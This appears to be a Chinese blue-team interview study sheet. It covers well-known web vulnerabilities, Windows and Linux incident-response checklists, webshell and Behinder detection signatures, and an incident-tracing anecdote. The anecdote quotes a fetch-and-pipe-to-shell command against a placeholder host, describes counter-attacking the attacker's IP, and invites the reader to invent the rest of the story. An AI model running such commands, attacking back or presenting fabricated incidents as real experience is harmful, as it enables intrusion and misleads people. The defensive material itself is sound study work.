得到 rememberMe 的 cookie 值–>Base64 解码–>AES 解密–>反序列化
AES 的密钥是硬编码在代码里,就导致了反序列化的 RCE 漏洞
SHIRO-721 反序列化漏洞
不需要 key,利用 Padding Oracle Attack 构造出 RememberMe 字段
后段的值结合合法的 RememberMe cookie 即可完成攻击
泛微 Ecology OA SQL 注入漏洞
validate.jsp 接口的 SQL 注入,/cpt/manage/validate.jsp
泛微 ecology OA 系统接口存在数据库配置信息泄露
/mobile/dbconfigreader.jsp,直接访问该页面将为 DES 加密以后的乱码,使 用 DES 算法结合硬编码的 key 进行解密
Confluence 本地文件泄露漏洞(CVE-2019-3394)
catalina.jar 中的 org.apache.catalina.webresources.StandardRoot.class
的 getResource 方法的 validate 存在过滤和限制,所以可遍历路径均在
/WEB-INF 下
Apache Dubbo 反序列化漏洞(CVE-2019-17564) 当 HTTP remoting 开启的时候,存在反序列化漏洞
1.19.6 讲诉 2020 年护网出现过那些 oday 漏洞
答:
漏洞列表详细见老男孩 2020 护网 Word 文档
1.19.7 2021 最新反序列化漏洞有那些
答:Apache 的 struts2 dos 攻击 s2-060,可以用岁月联盟抓包工具看到 mu 头里插入
POC 攻击代码,还有 Apache Struts2 远程代码执行漏洞(CVE-2020-17530);
weblogic 最新漏洞
cve-2021-2109 和 2135 漏洞: 影响 weblogic 版本 10.3.6 12.1.3 12.2.1.3 12.2.1.4
14.1.1.0,利用方法通过工具直接利用
1.19.8 http 和 https 区别,用了什么加密
答:https 协议需要到 CA 申请证书,一般免费证书较少,因而需要一定费用;2、http 是
超文本传输协议,信息是明文传输,https 则是具有安全性的【ssl/tls】加密传输协议(注:
HTTP 端口是 80 端口,HTTPS 是 443 端口)。
1.20 应急响应
1.20.1 网络安全事件应急响应(如,一业务主站被挂黑页的处理流程及应对方
法)
- 取证,登录服务器,备份,检查服务器敏感目录,查毒(搜索后
门文件 - 注意文件的时间,用户,后缀等属性),调取日志(系统
日志,中间件日志,WAF 日 志等); - 处理,恢复备份(快照回滚,最近一次),确定入侵方法(漏洞
检测,并进行修复) - 溯源,查入侵 IP,入侵手法(网路攻击事件)的确定等
- 记录,归档--------预防-事件检测-抑制-根除-恢复-跟踪-记录
通用漏洞的应对等其他安全应急事件
1.20.2 Windows 系统中毒了,说说你的应急方法
一、检查系统账号安全
1、查看服务器是否有弱口令、可疑账号、隐藏账号、克隆账号、远
程管理端口是否对公网开放。
2、Win+R 打开运行,输入“eventvwr.msc”打开操作系统日志,查
看管理员登录时间、用户名是否存在异常。
二、检查异常端口、进程
1、使用 netstat -ano 检查端口连接情况,是否有远程连接、可疑
连接(主要定位 ESTABLISHED)。
2、根据 netstat 定位出的 pid,再通过 tasklist 命令进行进程定
位 tasklist | findstr “PID” 3、也可以使用 D 盾_web 查杀工具、火绒剑、XueTr 等工具进行判
断可疑进程(如蓝色、红色进程、没有签名验证信息的进程、没有
描述信息的进程、进程的属主、进程的路径是否合法、 CPU 或内存
资源占用长时间过高的进程)
三、检查启动项、计划任务、服务
1、检查服务器是否有异常的启动项,如:单击开始菜单 >【运
行】,输入 msconfig 看一下启动项是否存在可疑启动,注册表 run
键值是否存在可疑启用文件,组策略,运行 gpedit.msc 查看脚本启
动是否存在启用文件等
2、检查计划任务,如单击【开始】>【设置】>【控制面板】>【任
务计划】,查看计划任务属性,便可以发现木马文件的路径
3、检查服务自启动,如单击【开始】>【运行】,输入
services.msc,注意服务状态和启动类型,检查是否有异常服务。
四、检查系统相关信息
1、查看系统版本以及补丁信息
检查方法:单击【开始】>【运行】,输入 systeminfo,查看系统
信息是否打了补丁
2、查找可疑目录及文件
检查方法:
a、 查看用户目录,新建账号会在这个目录生成一个用户目录,查
看是否有新建用户目录。
Window 2003 C:\Documents and Settings
Window 2008R2 C:\Users
b、单击【开始】>【运行】,输入%UserProfile%\Recent,分析最
近打开分析可疑文件。
c、在服务器各个目录,可根据文件夹内文件列表时间进行排序,查
找可疑文件。
五、自动化查杀
用 360、卡巴斯基等病毒查杀系统病毒木马,Web 可以用 D 盾、河马
工具查杀 Webshell 后门
六、日志分析
用 360 星图日志分析工具进行分析攻击痕迹或手工结合 EmEditor 进
行日志分析
1.20.3 Linux 系统中毒了,说说你的应急方法
1、检查用户及密码文件/etc/passwd、/etc/shadow 是否存在多余帐号,主要看一下帐
号后面是否是 nologin,如果没有 nologin 就要注意;
2、通过 who 命令查看当前登录用户(tty 本地登陆 pts 远程登录)、w 命令查看系统
信息,想知道某一时刻用户的行为、uptime 查看登陆多久、多少用户,负载;
3、修改/etc/profile 的文件,在尾部添加相应显示时间、日期、ip、命令脚本代码,这
样输入 history 命令就会详细显示攻击者 ip、时间历史命令等;
4、用 netstat -antlp|more 命令分析可疑端口、IP、PID,查看下 pid 所对应的进程文件
路径,运行 ls -l /proc/PID/exe($PID 为对应的 pid 号);
5、使用 ps 命令,分析进程 ps aux | grep pid
6、使用 vi /etc/inittab 查看系统当前运行级别,通过运行级别找到/etc/rc.d/rc[0~6].d
对应目录是否存在可疑文件;
7、看一下 crontab 定时任务是否存在可疑启用脚本;
8、使用 chkconfig --list 查看是否存在可疑服务;
9、通过 grep awk 命令分析/var/log/secure 安全日志里面是否存在攻击痕迹;
10、chkrootkit、rkhunter、Clamav 病毒后门查杀工具对 Linux 系统文件查杀;
11、如果有 Web 站点,可通过 D 盾、河马查杀工具进行查杀或者手工对代码按脚本木
马关键字、关键涵数(evel、system、shell_exec、exec、passthru system、popen)进行查
杀 Webshell 后门。
1.20.4 简单描述一下你在工作中遇到有意思的攻击溯源事件
有一天我们公司或客户反应公司门户网站打开之后会弹赌博和色情网页,接到用户反
应之后,我通过自己的电脑打开公司门户网站并没有发现弹赌博和色情网页,后来通过手
机访问发现果然一打开就会弹赌博和色情网页,后面我通过以下方法进行一步一步排查:
1、 打开 burp 设置手机代理抓包发现网站首页返回包里面有一串
xx.js 文件,打开包含的 js 文件发现里面有弹出来的色情赌博网站。
2、 我立马登录服务器通过 netstat –anplt、ps aux、chkconfig –list 查看当前服务器连
接、进程、服务等并没有发现异常; 3、 访问开机启动配置文件/etc/rc.local、/etc/rc.d/rc[0~6].d 也没发现异常;查看
crontab 定时任务也正常;
4、 查看/etc/passwd、/etc/shadow 也正常;
5、 使用 vi 对/etc/profile 配置文件进行加入显示 ip、日期时间、详细命令代码,再使
用 histroy 查看历史命令,发现攻击者使用了 wget –o –q
http://www.xxx.com/xx/logo.jpg|sh 下载脚本后门,我立马通过 find / -name logo.jpg
找出攻击者下载到服务器的 logo.jpg 文件,打开 logo.jpg 发现里面存在一段通过 if
判断 user-agent 头判断用户是通过手机还是 pc 机访问的代码,同时我也通过
xsearch 工具查找网站源代码里面是否存在调用 logo.jpg 文件的代码,果然发现网
站源代码里面存在 include 涵数调用 logo.jpg 文件后门代码,删除网站源代码里面
的 include 涵数调用代码和服务器里面里面的 logo.jpg,接着用手机访问网站首页,
发现还是存在弹赌博和色情网页,排查了很久,结果发现 ngix.conf 配置文件里面
有一行 proxy_pass http://www.xxxx.com/xxx/xx.js 代码,直接删掉再次访问,果然
恢复正常;
6、 接着开始攻击溯源,到网站目录按时间进行排序查看修改过的脚本文件,发现了
新上传的 Webshell,以 webshell 文件名和前面的 logo.jpg 作为关键字到 nginx 日志
文件/var/log/access.log 里面查找攻击痕迹,结果发现了一段 stur2 攻击代码:
直接使用安恒内部 stur2 内部验证工具对日志里面存在的攻击地址一验证,发现果
然是从 stur2-057 漏洞进来的,立马升级 stur2 框架修复漏洞。
7、 通过日志里面的攻击 ip 到 https://www.opengps.cn/Data/IP/LocHighAcc.aspx 进行定
位,发现是国外菲律宾攻击者,通过漏洞扫描器、手工对攻击 ip 开始尝试反攻,
故事后面你自己再慢慢编编下来,哈哈……….‘’
1.21 Linux 安全考题
1.21.1 Linux 创建用户命令并配置权限
- Useradd 用户名
- Chmod
1.21.2 Linux 怎么启动服务、怎么查看服务状态
1、查看 linux 系统下所有的服务,使用命令:chkconfig --list
2、chkconfig --level 服务运行级别 服务名称 on|off
如:chkconfig --level 345 nfs off
1.22 安全监控
1.22.1 冰蝎 2.0 和 3.0 的区别
1、反弹 shell 中增加 cs 一键上线功能 新增 Java 内存马注入,支持多种 web 容器,
2、反弹 shell 支持一键穿透在目标内网不能出网的情况下实现目标内网反向木马连接
3、新增基于端口映射的 socks 代理内网直接将 socks 代理服务开到远程 vps,新增 shell 关
键字搜索
1.22.2 监控数据包如何判断冰蝎特征码
1、 http 包头中,content-type 为 application/octet-stream 强行特征码
2、 冰蝎 3.0 内置的默认 16 个 userAgent 都比较老,属于 N 年前的浏览器产品。
现实生活中很少有人使用。所以这个也可以作为 waf 规则特征。
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like
Gecko) Chrome/14.0.835.163 Safari/535.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101
Firefox/6.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML,
like Gecko) Version/5.1 Safari/534.50
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.9.168 Version/11.50
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC
2.0; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.0)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12
(KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; SE 2.X
MetaSr 1.0)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3
(KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko)
Chrome/13.0.782.41 Safari/535.1 QQBrowser/6.9.11079.201
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
QQBrowser/6.9.11079.201
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
3、 Accept 头一般为:text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
1.22.3 php 小马用到那些涵数
菜刀一句话:SERVER['DOCUMENT_ROOT'].$SERVER['PHP_SELF'];?>
1.22.4 说一下你的溯源过程
一般由监控组发现攻击包,可以从数据包中看到带有攻击特征码的数据包,有
返回结果的回包可以判断是否成功,如果确认成功,就说明该参数有漏洞,首先需
要通过监控设备、中间件日志、系统日志定位该 IP 地址,要知道攻击是怎样进来
的,去服务器排查攻击达到了哪个层面,有 web 层面,系统层面,数据库层面,
应用软件层面,首先排查系统层面有没有弱口令,可疑账号,克隆账号,远程管理
端口是否对公网开放,
web 一般是参数未过滤,看攻击者是否在内网提权进行横向的内网渗透,可以
用一些 360 星图工具排查日志, D 盾安全狗扫一下 web 代码里有没有脚本后门
代码,也可以根据流量监控设备查查攻击者日志及 payload 代码,找到之后通过
bp 还原攻击;
最后修复漏洞,可以将被攻击的 web 页面暂时下线,可以先加相关函数过
滤,之后根据查到的攻击源 IP 和各种信息收集的信息进行社工等
1.22.5 护网遇见比较多的报警有那些
弱口令、命令执行、反序列化、任意文件读取、SQL 注入等
1.22.6 wireshake 常用参数
参考:https://blog.csdn.net/why/article/details/107282137